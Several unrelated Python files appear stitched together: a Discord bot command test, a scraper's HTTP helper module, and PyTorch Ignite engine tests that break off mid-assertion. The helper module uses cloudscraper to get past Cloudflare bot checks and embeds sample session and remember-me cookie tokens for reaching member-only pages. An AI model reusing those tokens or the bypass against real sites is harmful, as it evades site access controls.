set_colour, \
set_colorection, \
set_vis, \
set_view, \
show, \
spectrum, \
stereo, \
toggle, \
turn, \
view, \
viewport, \
window, \
zoom
#--------------------------------------------------------------------
from . import setting
from .setting import \
set, \
set_bond, \
get_bond, \
get, \
unset, \
unset_bond, \
unset_deep, \
get_setting_boolean, \
get_setting_int, \
get_setting_float, \
get_setting_float as get_setting_legacy, \
get_setting_tuple, \
get_setting_updates, \
get_setting_text
#--------------------------------------------------------------------
from .parsing import \
run, \
spawn
#--------------------------------------------------------------------
from . import helping
from .helping import \
abort, \
api, \
show_help, \
help, \
help_setting, \
commands
#--------------------------------------------------------------------
from .keyboard import \
editing_ring
#--------------------------------------------------------------------
from .experimenting import \
check, \
dump, \
get_bond_print, \
fast_minimize, \
mem, \
minimize, \
spheroid, \
focal_blur, \
callout, \
desaturate, \
test
from .internal import \
download_chem_comp, \
file_read
from .util import \
get_sasa_relative
from .stereochemistry import \
assign_stereo
#--------------------------------------------------------------------
# Modules which contain programs used explicitly as "module.xxx"
from . import util
from . import movie
from . import gui
|
the-stack_0_19887 | import pytest
from unittest.mock import AsyncMock, MagicMock, call
from discord_ritoman.bot.bot import bot
from discord_ritoman.bot.bot_command import GLOBAL_COMMAND_TABLE, bot_command
from discord_ritoman.utils import create_logger
logger = create_logger(__file__)
@pytest.mark.asyncio
async def test_bot_command_decorator():
"""
tests that the bot command decorator works correctly
"""
mock_logger = MagicMock()
@bot_command("mycommand")
class MyBotCommand:
@staticmethod
async def default(ctx, *args, **kwargs):
mock_logger("default")
await ctx.send("yes")
@staticmethod
async def option_one(ctx, *args, **kwargs):
mock_logger("option one")
count = 0
for command in bot.commands:
if command.name in GLOBAL_COMMAND_TABLE:
count += 1
assert count == len(GLOBAL_COMMAND_TABLE.items()) > 0
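    # chained comparison: asserts both count == len(...) and len(...) > 0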
assert "testcommand" in GLOBAL_COMMAND_TABLE
assert "mycommand" in GLOBAL_COMMAND_TABLE
assert "testcommand" in bot.all_commands
assert "mycommand" in bot.all_commands
assert "denounce" in bot.all_commands
await MyBotCommand(AsyncMock(), "one", "four", 3)
await MyBotCommand(AsyncMock())
mock_logger.assert_has_calls(
[call("default"), call("option one")], any_order=True
)
def test_help_string_contained():
""""""
assert bot.all_commands["testcommand"].help == "this is a testing command"
|
the-stack_0_19888 | from os import replace
import requests
#import hashlib
from pathlib import Path
import secrets
import os.path
import os
import uuid
import json
import time
from lxml import etree
import re
import config
from urllib.parse import urljoin
import mechanicalsoup
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
from cloudscraper import create_scraper
from concurrent.futures import ThreadPoolExecutor
def getXpathSingle(htmlcode, xpath):
html = etree.fromstring(htmlcode, etree.HTMLParser())
result1 = str(html.xpath(xpath)).strip(" ['']")
return result1
G_USER_AGENT = r'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36'
# Core helper for HTTP GET requests
def get_html(url, cookies: dict = None, ua: str = None, return_type: str = None, encoding: str = None):
verify = config.getInstance().cacert_file()
configProxy = config.getInstance().proxy()
errors = ""
headers = {"User-Agent": ua or G_USER_AGENT} # noqa
for i in range(configProxy.retry):
try:
if configProxy.enable:
proxies = configProxy.proxies()
result = requests.get(str(url), headers=headers, timeout=configProxy.timeout, proxies=proxies, verify=verify,
cookies=cookies)
else:
result = requests.get(str(url), headers=headers, timeout=configProxy.timeout, cookies=cookies)
if return_type == "object":
return result
elif return_type == "content":
return result.content
else:
result.encoding = encoding or result.apparent_encoding
return result.text
except Exception as e:
print("[-]Connect retry {}/{}".format(i + 1, configProxy.retry))
errors = str(e)
if "getaddrinfo failed" in errors:
print("[-]Connect Failed! Please Check your proxy config")
debug = config.getInstance().debug()
if debug:
print("[-]" + errors)
else:
print("[-]" + errors)
print('[-]Connect Failed! Please check your Proxy or Network!')
raise Exception('Connect Failed')
def post_html(url: str, query: dict, headers: dict = None) -> requests.Response:
configProxy = config.getInstance().proxy()
errors = ""
headers_ua = {"User-Agent": G_USER_AGENT}
if headers is None:
headers = headers_ua
else:
headers.update(headers_ua)
for i in range(configProxy.retry):
try:
if configProxy.enable:
proxies = configProxy.proxies()
result = requests.post(url, data=query, proxies=proxies, headers=headers, timeout=configProxy.timeout)
else:
result = requests.post(url, data=query, headers=headers, timeout=configProxy.timeout)
return result
except Exception as e:
print("[-]Connect retry {}/{}".format(i + 1, configProxy.retry))
errors = str(e)
print("[-]Connect Failed! Please check your Proxy or Network!")
print("[-]" + errors)
G_DEFAULT_TIMEOUT = 10 # seconds
class TimeoutHTTPAdapter(HTTPAdapter):
def __init__(self, *args, **kwargs):
self.timeout = G_DEFAULT_TIMEOUT
if "timeout" in kwargs:
self.timeout = kwargs["timeout"]
del kwargs["timeout"]
super().__init__(*args, **kwargs)
def send(self, request, **kwargs):
timeout = kwargs.get("timeout")
if timeout is None:
kwargs["timeout"] = self.timeout
return super().send(request, **kwargs)
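# A minimal usage sketch of the adapter above (mirrors the session setup in the
# helpers below; the URL is illustrative):
#   s = requests.Session()
#   s.mount("https://", TimeoutHTTPAdapter(timeout=5))
#   s.get("https://example.com")  # inherits the 5 second timeout automatically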
# with keep-alive feature
def get_html_session(url:str = None, cookies: dict = None, ua: str = None, return_type: str = None, encoding: str = None):
configProxy = config.getInstance().proxy()
session = requests.Session()
if isinstance(cookies, dict) and len(cookies):
requests.utils.add_dict_to_cookiejar(session.cookies, cookies)
retries = Retry(total=configProxy.retry, connect=configProxy.retry, backoff_factor=1, status_forcelist=[429, 500, 502, 503, 504])
session.mount("https://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
session.mount("http://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
if configProxy.enable:
session.verify = config.getInstance().cacert_file()
session.proxies = configProxy.proxies()
headers = {"User-Agent": ua or G_USER_AGENT}
session.headers = headers
try:
if isinstance(url, str) and len(url):
result = session.get(str(url))
        else:  # an empty url returns the reusable session object directly; return_type is not needed
return session
if not result.ok:
return None
if return_type == "object":
return result
elif return_type == "content":
return result.content
elif return_type == "session":
return result, session
else:
result.encoding = encoding or "utf-8"
return result.text
except requests.exceptions.ProxyError:
print("[-]get_html_session() Proxy error! Please check your Proxy")
except Exception as e:
print(f"[-]get_html_session() failed. {e}")
return None
def get_html_by_browser(url:str = None, cookies: dict = None, ua: str = None, return_type: str = None, encoding: str = None, use_scraper: bool = False):
configProxy = config.getInstance().proxy()
s = create_scraper(browser={'custom': ua or G_USER_AGENT,}) if use_scraper else requests.Session()
if isinstance(cookies, dict) and len(cookies):
requests.utils.add_dict_to_cookiejar(s.cookies, cookies)
retries = Retry(total=configProxy.retry, connect=configProxy.retry, backoff_factor=1, status_forcelist=[429, 500, 502, 503, 504])
s.mount("https://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
s.mount("http://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
if configProxy.enable:
s.verify = config.getInstance().cacert_file()
s.proxies = configProxy.proxies()
try:
browser = mechanicalsoup.StatefulBrowser(user_agent=ua or G_USER_AGENT, session=s)
if isinstance(url, str) and len(url):
result = browser.open(url)
else:
return browser
if not result.ok:
return None
if return_type == "object":
return result
elif return_type == "content":
return result.content
elif return_type == "browser":
return result, browser
else:
result.encoding = encoding or "utf-8"
return result.text
except requests.exceptions.ProxyError:
print("[-]get_html_by_browser() Proxy error! Please check your Proxy")
except Exception as e:
print(f'[-]get_html_by_browser() Failed! {e}')
return None
def get_html_by_form(url, form_select: str = None, fields: dict = None, cookies: dict = None, ua: str = None, return_type: str = None, encoding: str = None):
configProxy = config.getInstance().proxy()
s = requests.Session()
if isinstance(cookies, dict) and len(cookies):
requests.utils.add_dict_to_cookiejar(s.cookies, cookies)
retries = Retry(total=configProxy.retry, connect=configProxy.retry, backoff_factor=1, status_forcelist=[429, 500, 502, 503, 504])
s.mount("https://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
s.mount("http://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
if configProxy.enable:
s.verify = config.getInstance().cacert_file()
s.proxies = configProxy.proxies()
try:
browser = mechanicalsoup.StatefulBrowser(user_agent=ua or G_USER_AGENT, session=s)
result = browser.open(url)
if not result.ok:
return None
form = browser.select_form() if form_select is None else browser.select_form(form_select)
if isinstance(fields, dict):
for k, v in fields.items():
browser[k] = v
response = browser.submit_selected()
if return_type == "object":
return response
elif return_type == "content":
return response.content
elif return_type == "browser":
return response, browser
else:
result.encoding = encoding or "utf-8"
return response.text
except requests.exceptions.ProxyError:
print("[-]get_html_by_form() Proxy error! Please check your Proxy")
except Exception as e:
print(f'[-]get_html_by_form() Failed! {e}')
return None
def get_html_by_scraper(url:str = None, cookies: dict = None, ua: str = None, return_type: str = None, encoding: str = None):
configProxy = config.getInstance().proxy()
session = create_scraper(browser={'custom': ua or G_USER_AGENT,})
if isinstance(cookies, dict) and len(cookies):
requests.utils.add_dict_to_cookiejar(session.cookies, cookies)
retries = Retry(total=configProxy.retry, connect=configProxy.retry, backoff_factor=1, status_forcelist=[429, 500, 502, 503, 504])
session.mount("https://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
session.mount("http://", TimeoutHTTPAdapter(max_retries=retries, timeout=configProxy.timeout))
if configProxy.enable:
session.verify = config.getInstance().cacert_file()
session.proxies = configProxy.proxies()
try:
if isinstance(url, str) and len(url):
result = session.get(str(url))
        else:  # an empty url returns the reusable scraper object directly; return_type is not needed
return session
if not result.ok:
return None
if return_type == "object":
return result
elif return_type == "content":
return result.content
elif return_type == "scraper":
return result, session
else:
result.encoding = encoding or "utf-8"
return result.text
except requests.exceptions.ProxyError:
print("[-]get_html_by_scraper() Proxy error! Please check your Proxy")
except Exception as e:
print(f"[-]get_html_by_scraper() failed. {e}")
return None
# def get_javlib_cookie() -> [dict, str]:
# import cloudscraper
# switch, proxy, timeout, retry_count, proxytype = config.getInstance().proxy()
# proxies = get_proxy(proxy, proxytype)
#
# raw_cookie = {}
# user_agent = ""
#
# # Get __cfduid/cf_clearance and user-agent
# for i in range(retry_count):
# try:
# if switch == 1 or switch == '1':
# raw_cookie, user_agent = cloudscraper.get_cookie_string(
# "http://www.javlibrary.com/",
# proxies=proxies
# )
# else:
# raw_cookie, user_agent = cloudscraper.get_cookie_string(
# "http://www.javlibrary.com/"
# )
# except requests.exceptions.ProxyError:
# print("[-] ProxyError, retry {}/{}".format(i + 1, retry_count))
# except cloudscraper.exceptions.CloudflareIUAMError:
# print("[-] IUAMError, retry {}/{}".format(i + 1, retry_count))
#
# return raw_cookie, user_agent
def translate(
src: str,
target_language: str = "zh_cn",
engine: str = "google-free",
app_id: str = "",
key: str = "",
delay: int = 0,
):
trans_result = ""
    # Google Translate may truncate Chinese sentences containing symbols such as '&',
    # and translating Chinese into Chinese is pointless anyway, so only translate
    # text that contains Japanese kana
if not is_japanese(src):
return src
if engine == "google-free":
gsite = config.getInstance().get_translate_service_site()
        if not re.match(r'^translate\.google\.(com|com\.\w{2}|\w{2})$', gsite):
gsite = 'translate.google.cn'
url = (
f"https://{gsite}/translate_a/single?client=gtx&dt=t&dj=1&ie=UTF-8&sl=auto&tl={target_language}&q={src}"
)
result = get_html(url=url, return_type="object")
if not result.ok:
print('[-]Google-free translate web API calling failed.')
return ''
translate_list = [i["trans"] for i in result.json()["sentences"]]
        trans_result = ''.join(translate_list)
elif engine == "azure":
url = "https://api.cognitive.microsofttranslator.com/translate?api-version=3.0&to=" + target_language
headers = {
'Ocp-Apim-Subscription-Key': key,
'Ocp-Apim-Subscription-Region': "global",
'Content-type': 'application/json',
'X-ClientTraceId': str(uuid.uuid4())
}
body = json.dumps([{'text': src}])
result = post_html(url=url, query=body, headers=headers)
translate_list = [i["text"] for i in result.json()[0]["translations"]]
        trans_result = ''.join(translate_list)
else:
raise ValueError("Non-existent translation engine")
time.sleep(delay)
return trans_result
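# Usage sketch (requires network access to the configured translate service; the
# azure engine additionally needs a real subscription key):
#   translate('ラベル', target_language='zh_cn', engine='google-free')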
# Cookies exported from a logged-in browser session allow opening member-only
# pages that guest visitors cannot reach.
# Example: FC2-755670 url https://javdb9.com/v/vO8Mn
# JSON file format
# File name: <site name>.json, e.g. javdb9.json
# Content (file encoding: UTF-8):
'''
{
"over18":"1",
"redirect_to":"%2Fv%2FvO8Mn",
"remember_me_token":"cbJdeaFpbHMiOnsibWVzc2FnZSI6IklrNVJjbTAzZFVSRVlVaEtPWEpUVFhOVU0yNXhJZz09IiwiZXhwIjoiMjAyMS0wNS0xNVQxMzoyODoxNy4wMDBaIiwicHVyIjoiY29va2llLnJlbWVtYmVyX21lX3Rva2VuIn19--a7131611e844cf75f9db4cd411b635889bff3fe3",
"_jdb_session":"asddefqfwfwwrfdsdaAmqKj1%2FvOrDQP4b7h%2BvGp7brvIShi2Y%2FHBUr%2BklApk06TfhBOK3g5gRImZzoi49GINH%2FK49o3W%2FX64ugBiUAcudN9b27Mg6Ohu%2Bx9Z7A4bbqmqCt7XR%2Bao8PRuOjMcdDG5czoYHJCPIPZQFU28Gd7Awc2jc5FM5CoIgSRyaYDy9ulTO7DlavxoNL%2F6OFEL%2FyaA6XUYTB2Gs1kpPiUDqwi854mo5%2FrNxMhTeBK%2BjXciazMtN5KlE5JIOfiWAjNrnx7SV3Hj%2FqPNxRxXFQyEwHr5TZa0Vk1%2FjbwWQ0wcIFfh%2FMLwwqKydAh%2FLndc%2Bmdv3e%2FJ%2BiL2--xhqYnMyVRlxJajdN--u7nl0M7Oe7tZtPd4kIaEbg%3D%3D",
"locale":"zh",
"__cfduid":"dee27116d98c432a5cabc1fe0e7c2f3c91620479752",
"theme":"auto"
}
'''
# After logging in to the site, the cookie content can be copied or exported with a
# browser extension (CookieBro or EditThisCookie) or straight from the site info shown
# in the address bar, then filled into the corresponding fields of the JSON file above.
def load_cookies(filename):
filename = os.path.basename(filename)
if not len(filename):
return None, None
path_search_order = (
Path.cwd() / filename,
Path.home() / filename,
Path.home() / f".mdc/{filename}",
Path.home() / f".local/share/mdc/{filename}"
)
cookies_filename = None
try:
for p in path_search_order:
if p.is_file():
cookies_filename = str(p.resolve())
break
if not cookies_filename:
return None, None
return json.load(open(cookies_filename)), cookies_filename
except:
return None, None
# Days elapsed since the file was last modified
def file_modification_days(filename) -> int:
mfile = Path(filename)
if not mfile.is_file():
return 9999
mtime = int(mfile.stat().st_mtime)
now = int(time.time())
days = int((now - mtime) / (24 * 60 * 60))
if days < 0:
return 9999
return days
def file_not_exist_or_empty(filepath) -> bool:
return not os.path.isfile(filepath) or os.path.getsize(filepath) == 0
# Simple Japanese-text detection (hiragana, katakana, half-width katakana)
def is_japanese(s) -> bool:
return bool(re.search(r'[\u3040-\u309F\u30A0-\u30FF\uFF66-\uFF9F]', s, re.UNICODE))
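# e.g. is_japanese('ラベル') is True (katakana), while is_japanese('素人') is False
# because the pattern only matches kana, not kanji.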
# Usage: python ./ADC_function.py https://cn.bing.com/
if __name__ == "__main__":
import sys, timeit
from http.client import HTTPConnection
def benchmark(t, url):
print(f"HTTP GET Benchmark times:{t} url:{url}")
tm = timeit.timeit(f"_ = session1.get('{url}')",
"from __main__ import get_html_session;session1=get_html_session()",
number=t)
print(f' *{tm:>10.5f}s get_html_session() Keep-Alive enable')
tm = timeit.timeit(f"_ = scraper1.get('{url}')",
"from __main__ import get_html_by_scraper;scraper1=get_html_by_scraper()",
number=t)
print(f' *{tm:>10.5f}s get_html_by_scraper() Keep-Alive enable')
tm = timeit.timeit(f"_ = browser1.open('{url}')",
"from __main__ import get_html_by_browser;browser1=get_html_by_browser()",
number=t)
print(f' *{tm:>10.5f}s get_html_by_browser() Keep-Alive enable')
tm = timeit.timeit(f"_ = get_html('{url}')",
"from __main__ import get_html",
number=t)
print(f' *{tm:>10.5f}s get_html()')
t = 100
#url = "https://www.189.cn/"
url = "http://www.chinaunicom.com"
HTTPConnection.debuglevel = 1
s = get_html_session()
_ = s.get(url)
HTTPConnection.debuglevel = 0
if len(sys.argv)>1:
url = sys.argv[1]
benchmark(t, url)
def download_file_with_filename(url, filename, path):
conf = config.getInstance()
configProxy = conf.proxy()
for i in range(configProxy.retry):
try:
if configProxy.enable:
if not os.path.exists(path):
try:
os.makedirs(path)
except:
print(f"[-]Fatal error! Can not make folder '{path}'")
sys.exit(0)
proxies = configProxy.proxies()
headers = {
'User-Agent': G_USER_AGENT}
r = requests.get(url, headers=headers, timeout=configProxy.timeout, proxies=proxies)
                if not r.ok:  # a Response object never equals ''; check the HTTP status instead
print('[-]Movie Download Data not found!')
return
with open(os.path.join(path, filename), "wb") as code:
code.write(r.content)
return
else:
if not os.path.exists(path):
try:
os.makedirs(path)
except:
print(f"[-]Fatal error! Can not make folder '{path}'")
sys.exit(0)
headers = {
'User-Agent': G_USER_AGENT}
r = requests.get(url, timeout=configProxy.timeout, headers=headers)
                if not r.ok:  # a Response object never equals ''; check the HTTP status instead
print('[-]Movie Download Data not found!')
return
with open(os.path.join(path, filename), "wb") as code:
code.write(r.content)
return
        except requests.exceptions.RequestException:
            # ConnectionError, ProxyError and ConnectTimeout are all subclasses of
            # RequestException, so a single handler covers every retryable case
            print('[-]Download : Connect retry ' + str(i + 1) + '/' + str(configProxy.retry))
        except IOError:
            raise ValueError(f"[-]Create Directory '{path}' failed!")
    print('[-]Connect Failed! Please check your Proxy or Network!')
    raise ValueError('[-]Connect Failed! Please check your Proxy or Network!')
def download_one_file(args):
def _inner(url: str, save_path: Path):
filebytes = get_html(url, return_type='content')
if isinstance(filebytes, bytes) and len(filebytes):
            with save_path.open('wb') as f:
                if len(filebytes) == f.write(filebytes):
                    return str(save_path)
return _inner(*args)
'''Usage example: download two different files on 2 threads at the same time and save
them to different paths. The target directories may not exist yet, but write permission
to the target directories and files is required.
parallel_download_files([
    ('https://site1/img/p1.jpg', 'C:/temp/img/p1.jpg'),
    ('https://site2/cover/n1.xml', 'C:/tmp/cover/n1.xml')
    ])
'''
# dn_list may be a tuple or a list: ((url1, save_fullpath1), (url2, save_fullpath2),)
# parallel: number of threads in the download pool; 0 lets the function decide
def parallel_download_files(dn_list, parallel: int = 0):
mp_args = []
for url, fullpath in dn_list:
if url and isinstance(url, str) and url.startswith('http') and fullpath and isinstance(fullpath, (str, Path)) and len(str(fullpath)):
fullpath = Path(fullpath)
fullpath.parent.mkdir(parents=True, exist_ok=True)
mp_args.append((url, fullpath))
if not len(mp_args):
return []
if not isinstance(parallel, int) or parallel not in range(1,200):
parallel = min(5, len(mp_args))
with ThreadPoolExecutor(parallel) as pool:
results = list(pool.map(download_one_file, mp_args))
return results
def delete_all_elements_in_list(string,lists):
new_lists = []
for i in lists:
if i != string:
new_lists.append(i)
return new_lists
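# Equivalent one-liner, noted here for reference:
#   new_lists = [i for i in lists if i != string]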
|
the-stack_0_19889 | import os
import time
from unittest.mock import call, MagicMock, Mock
import numpy as np
import pytest
import torch
import ignite.distributed as idist
from ignite.engine import Engine, Events, State
from ignite.engine.deterministic import keep_random_state
from ignite.metrics import Average
from tests.ignite.engine import BatchChecker, EpochCounter, IterationCounter
def test_terminate():
engine = Engine(lambda e, b: 1)
assert not engine.should_terminate
engine.terminate()
assert engine.should_terminate
def test_invalid_process_raises_with_invalid_signature():
with pytest.raises(ValueError, match=r"Engine must be given a processing function in order to run"):
Engine(None)
with pytest.raises(ValueError, match=r"Error adding .+ takes parameters .+ but will be called with"):
Engine(lambda: None)
with pytest.raises(ValueError, match=r"Error adding .+ takes parameters .+ but will be called with"):
Engine(lambda batch: None)
with pytest.raises(ValueError, match=r"Error adding .+ takes parameters .+ but will be called with"):
Engine(lambda engine, batch, extra_arg: None)
def test_invalid_input_data():
engine = Engine(lambda e, b: None)
def data():
pass
with pytest.raises(TypeError, match=r"Argument data should be iterable"):
engine.run(data)
@pytest.mark.parametrize("data", [None, [1, 2]])
def test_current_epoch_counter_increases_every_epoch(data):
engine = Engine(MagicMock(return_value=1))
max_epochs = 5
counter = EpochCounter()
engine.add_event_handler(Events.EPOCH_STARTED, counter)
state = engine.run(data, max_epochs=max_epochs, epoch_length=2)
assert state.epoch == max_epochs
counter.current_epoch_count = 1
state = engine.run(data, max_epochs=max_epochs, epoch_length=2)
assert state.epoch == max_epochs
@pytest.mark.parametrize("data", [None, [1, 2, 3]])
def test_current_iteration_counter_increases_every_iteration(data):
engine = Engine(MagicMock(return_value=1))
max_epochs = 5
counter = IterationCounter()
engine.add_event_handler(Events.ITERATION_STARTED, counter)
epoch_length = 3
state = engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
assert state.iteration == max_epochs * epoch_length
counter.current_iteration_count = 1
state = engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
assert state.iteration == max_epochs * epoch_length
def test_stopping_criterion_is_max_epochs():
engine = Engine(MagicMock(return_value=1))
max_epochs = 5
state = engine.run([1], max_epochs=max_epochs)
assert state.epoch == max_epochs
@pytest.mark.parametrize("data", [None, [1, 2]])
def test_terminate_at_end_of_epoch_stops_run(data):
max_epochs = 5
last_epoch_to_run = 3
engine = Engine(MagicMock(return_value=1))
def end_of_epoch_handler(engine):
if engine.state.epoch == last_epoch_to_run:
engine.terminate()
engine.add_event_handler(Events.EPOCH_COMPLETED, end_of_epoch_handler)
assert not engine.should_terminate
state = engine.run(data, max_epochs=max_epochs, epoch_length=2)
assert state.epoch == last_epoch_to_run
assert engine.should_terminate
@pytest.mark.parametrize("data", [None, [1, 2, 3]])
def test_terminate_at_start_of_epoch_stops_run_after_completing_iteration(data):
max_epochs = 5
epoch_to_terminate_on = 3
epoch_length = 3
engine = Engine(MagicMock(return_value=1))
def start_of_epoch_handler(engine):
if engine.state.epoch == epoch_to_terminate_on:
engine.terminate()
engine.add_event_handler(Events.EPOCH_STARTED, start_of_epoch_handler)
assert not engine.should_terminate
state = engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
# epoch is not completed so counter is not incremented
assert state.epoch == epoch_to_terminate_on
assert engine.should_terminate
# completes first iteration
assert state.iteration == ((epoch_to_terminate_on - 1) * epoch_length) + 1
@pytest.mark.parametrize("data", [None, list(range(10))])
def test_terminate_stops_run_mid_epoch(data):
num_iterations_per_epoch = len(data) if data is not None else 10
iteration_to_stop = num_iterations_per_epoch + 3
engine = Engine(MagicMock(return_value=1))
def start_of_iteration_handler(engine):
if engine.state.iteration == iteration_to_stop:
engine.terminate()
engine.add_event_handler(Events.ITERATION_STARTED, start_of_iteration_handler)
state = engine.run(data, max_epochs=3, epoch_length=num_iterations_per_epoch)
# completes the iteration but doesn't increment counter (this happens just before a new iteration starts)
assert state.iteration == iteration_to_stop
    assert state.epoch == np.ceil(iteration_to_stop / num_iterations_per_epoch)  # the epoch in which the stopping iteration falls
@pytest.mark.parametrize("data", [None, list(range(10))])
def test_terminate_epoch_stops_mid_epoch(data):
num_iterations_per_epoch = len(data) if data is not None else 10
iteration_to_stop = num_iterations_per_epoch + 4
engine = Engine(MagicMock(return_value=1))
def start_of_iteration_handler(engine):
if engine.state.iteration == iteration_to_stop:
engine.terminate_epoch()
max_epochs = 3
engine.add_event_handler(Events.ITERATION_STARTED, start_of_iteration_handler)
state = engine.run(data, max_epochs=max_epochs, epoch_length=num_iterations_per_epoch)
# completes the iteration but doesn't increment counter (this happens just before a new iteration starts)
true_value = num_iterations_per_epoch * (max_epochs - 1) + iteration_to_stop % num_iterations_per_epoch
assert state.iteration == true_value
def _create_mock_data_loader(epochs, batches_per_epoch):
batches = [MagicMock()] * batches_per_epoch
data_loader_manager = MagicMock()
batch_iterators = [iter(batches) for _ in range(epochs)]
data_loader_manager.__iter__.side_effect = batch_iterators
data_loader_manager.__len__.return_value = batches_per_epoch
return data_loader_manager
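# Note on the mock above: __iter__.side_effect hands out a fresh iterator for each
# epoch, mimicking how a real DataLoader restarts iteration at every epoch boundary.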
@pytest.mark.parametrize("data", [None, "mock_data_loader"])
def test_iteration_events_are_fired(data):
max_epochs = 5
num_batches = epoch_length = 3
if isinstance(data, str) and data == "mock_data_loader":
data = _create_mock_data_loader(max_epochs, num_batches)
epoch_length = None
engine = Engine(MagicMock(return_value=1))
mock_manager = Mock()
iteration_started = Mock()
engine.add_event_handler(Events.ITERATION_STARTED, iteration_started)
iteration_complete = Mock()
engine.add_event_handler(Events.ITERATION_COMPLETED, iteration_complete)
mock_manager.attach_mock(iteration_started, "iteration_started")
mock_manager.attach_mock(iteration_complete, "iteration_complete")
engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
assert iteration_started.call_count == num_batches * max_epochs
assert iteration_complete.call_count == num_batches * max_epochs
expected_calls = []
for _ in range(max_epochs * num_batches):
expected_calls.append(call.iteration_started(engine))
expected_calls.append(call.iteration_complete(engine))
assert mock_manager.mock_calls == expected_calls
@pytest.mark.parametrize("data", [None, [1, 2]])
def test_last_event_name(data):
engine = Engine(MagicMock(return_value=1))
assert engine.last_event_name is None
@engine.on(Events.STARTED)
def _(_engine):
assert _engine.last_event_name == Events.STARTED
@engine.on(Events.EPOCH_STARTED)
def _(_engine):
assert _engine.last_event_name == Events.EPOCH_STARTED
@engine.on(Events.ITERATION_STARTED)
def _(_engine):
assert _engine.last_event_name == Events.ITERATION_STARTED
@engine.on(Events.ITERATION_COMPLETED)
def _(_engine):
assert _engine.last_event_name == Events.ITERATION_COMPLETED
@engine.on(Events.EPOCH_COMPLETED)
def _(_engine):
assert _engine.last_event_name == Events.EPOCH_COMPLETED
epoch_length = 2 if data is None else None
engine.run(data, epoch_length=epoch_length)
assert engine.last_event_name == Events.COMPLETED
def test_reset_should_terminate():
def update_fn(engine, batch):
pass
engine = Engine(update_fn)
@engine.on(Events.ITERATION_COMPLETED)
def terminate_on_iteration_10(engine):
if engine.state.iteration == 10:
engine.terminate()
engine.run([0] * 20)
assert engine.state.iteration == 10
engine.run([0] * 20)
assert engine.state.iteration == 10
def test_batch_values():
def _test(data):
# This test check the content passed to update function
counter = [0]
num_iters = len(data)
def update_fn(_, batch):
assert batch == data[counter[0] % num_iters]
counter[0] += 1
engine = Engine(update_fn)
engine.run(data, max_epochs=10)
data = torch.randint(0, 1000, size=(256,))
_test(data)
def test_state_repr():
data = [0, 1, 2, 3, 4, 5]
max_epochs = 1
metrics = {"accuracy": Mock()}
state = State(dataloader=data, max_epochs=max_epochs, metrics=metrics)
s = repr(state)
assert "iteration" in s
assert "epoch" in s
assert "max_epochs: 1" in s
assert "dataloader" in s
assert "metrics" in s
assert "output" in s
assert "batch" in s
def test_alter_batch():
small_shape = (1, 2, 2)
large_shape = (1, 3, 3)
small_loader = torch.randint(0, 256, size=(30,) + small_shape)
large_loader = torch.randint(0, 256, size=(20,) + large_shape)
switch_iteration = 50
def should_take_large_img(i):
return i >= switch_iteration
def update_fn(engine, batch):
i = engine.state.iteration
if i < switch_iteration:
assert batch.shape == small_shape
assert (small_loader[(i - 1) % len(small_loader), ...] == batch).all()
else:
assert batch.shape == large_shape
assert (large_loader[(i - switch_iteration) % len(large_loader), ...] == batch).all()
trainer = Engine(update_fn)
def cycle(seq):
while True:
for i in seq:
yield i
small_loader_iter = cycle(small_loader)
large_loader_iter = cycle(large_loader)
@trainer.on(Events.ITERATION_STARTED)
def choose_batch(engine):
i = engine.state.iteration
if should_take_large_img(i):
batch = next(large_loader_iter)
else:
batch = next(small_loader_iter)
engine.state.batch = batch
num_epochs = 5
num_iters = 25
data = range(num_iters)
trainer.run(data, num_epochs)
def test__is_done():
state = State(iteration=10, epoch=1, max_epochs=100, epoch_length=100)
assert not Engine._is_done(state)
state = State(iteration=1000, max_epochs=10, epoch_length=100)
assert Engine._is_done(state)
def test__setup_engine():
engine = Engine(lambda e, b: 1)
engine.state = State(iteration=10, epoch=1, max_epochs=100, epoch_length=100)
data = list(range(100))
engine.state.dataloader = data
engine._setup_engine()
assert len(engine._init_iter) == 1 and engine._init_iter[0] == 10
def test_run_asserts():
engine = Engine(lambda e, b: 1)
with pytest.raises(ValueError, match=r"Input data has zero size. Please provide non-empty data"):
engine.run([])
def test_state_get_event_attrib_value():
state = State()
state.iteration = 10
state.epoch = 9
e = Events.ITERATION_STARTED
assert state.get_event_attrib_value(e) == state.iteration
e = Events.ITERATION_COMPLETED
assert state.get_event_attrib_value(e) == state.iteration
e = Events.EPOCH_STARTED
assert state.get_event_attrib_value(e) == state.epoch
e = Events.EPOCH_COMPLETED
assert state.get_event_attrib_value(e) == state.epoch
e = Events.STARTED
assert state.get_event_attrib_value(e) == state.epoch
e = Events.COMPLETED
assert state.get_event_attrib_value(e) == state.epoch
e = Events.ITERATION_STARTED(every=10)
assert state.get_event_attrib_value(e) == state.iteration
e = Events.ITERATION_COMPLETED(every=10)
assert state.get_event_attrib_value(e) == state.iteration
e = Events.EPOCH_STARTED(once=5)
assert state.get_event_attrib_value(e) == state.epoch
e = Events.EPOCH_COMPLETED(once=5)
assert state.get_event_attrib_value(e) == state.epoch
def test_time_stored_in_state():
def _test(data, max_epochs, epoch_length):
sleep_time = 0.01
extra_sleep_time = 0.1
engine = Engine(lambda e, b: time.sleep(sleep_time))
@engine.on(Events.EPOCH_COMPLETED)
def check_epoch_time():
assert engine.state.times[Events.EPOCH_COMPLETED.name] >= sleep_time * epoch_length
time.sleep(extra_sleep_time)
@engine.on(Events.COMPLETED)
def check_completed_time():
assert (
engine.state.times[Events.COMPLETED.name] >= (sleep_time * epoch_length + extra_sleep_time) * max_epochs
)
time.sleep(extra_sleep_time)
engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
assert engine.state.times[Events.EPOCH_COMPLETED.name] >= sleep_time * epoch_length + extra_sleep_time
assert (
engine.state.times[Events.COMPLETED.name]
